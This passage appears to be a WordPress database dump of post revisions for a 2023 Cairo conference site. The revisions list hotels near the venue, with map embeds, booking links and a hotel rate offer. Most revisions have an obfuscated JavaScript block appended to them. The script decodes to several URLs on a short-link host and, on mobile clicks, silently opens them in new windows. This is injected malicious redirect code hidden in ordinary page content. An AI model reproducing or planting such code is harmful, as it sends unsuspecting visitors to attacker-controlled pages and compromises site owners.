Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-15 16:50:32','2023-08-15 16:50:32','',2685,'https://gsw2023.com/?p=5203',0,'revision','',0),
(5204,1,'2023-08-15 16:51:28','2023-08-15 16:51:28','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\r\n<h4></h4>\r\n<ul>\r\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\r\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\r\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\r\n\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\r\n</ul>\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\r\n<ul>\r\n 	<li>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\r\n</li>\r\n</ul>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\r\n[/dt_banner]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-15 16:51:28','2023-08-15 16:51:28','',2685,'https://gsw2023.com/?p=5204',0,'revision','',0),
(5205,1,'2023-08-15 17:03:13','2023-08-15 17:03:13','<!-- wp:paragraph -->\r\n<p>For Booking</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Check in: 01.09.2023.<br />Checkout: 08.09.2023.<br />Duration: 07 nights.<br />Meals plan: BB basis.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our offer will be as follows:-<br />Room’s type Egyptian guests Foreigner guests<br /><strong>Single standard room</strong> LE 2650.00 USD 90.00<br /><strong>Single superior room</strong> LE 2850.00 USD 100.00<br /><strong>Single executive room</strong> LE 3050.00 USD 115.00<br />General conditions:-</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:list -->\r\n<ul><!-- wp:list-item -->\r\n<li>The above rates are per room per night.</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>Based on bed and American open buffet breakfast.</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>Inclusive service charge and VAT.</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>Inclusive internet connection (WIFI &amp; browsing only).</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>The above offer valid till 1.09.2023.<br /><strong>For booking you can send the bookings to the following email</strong><br />salescairo@flamencohotels.com</li>\r\n<!-- /wp:list-item --></ul>\r\n<!-- /wp:list -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 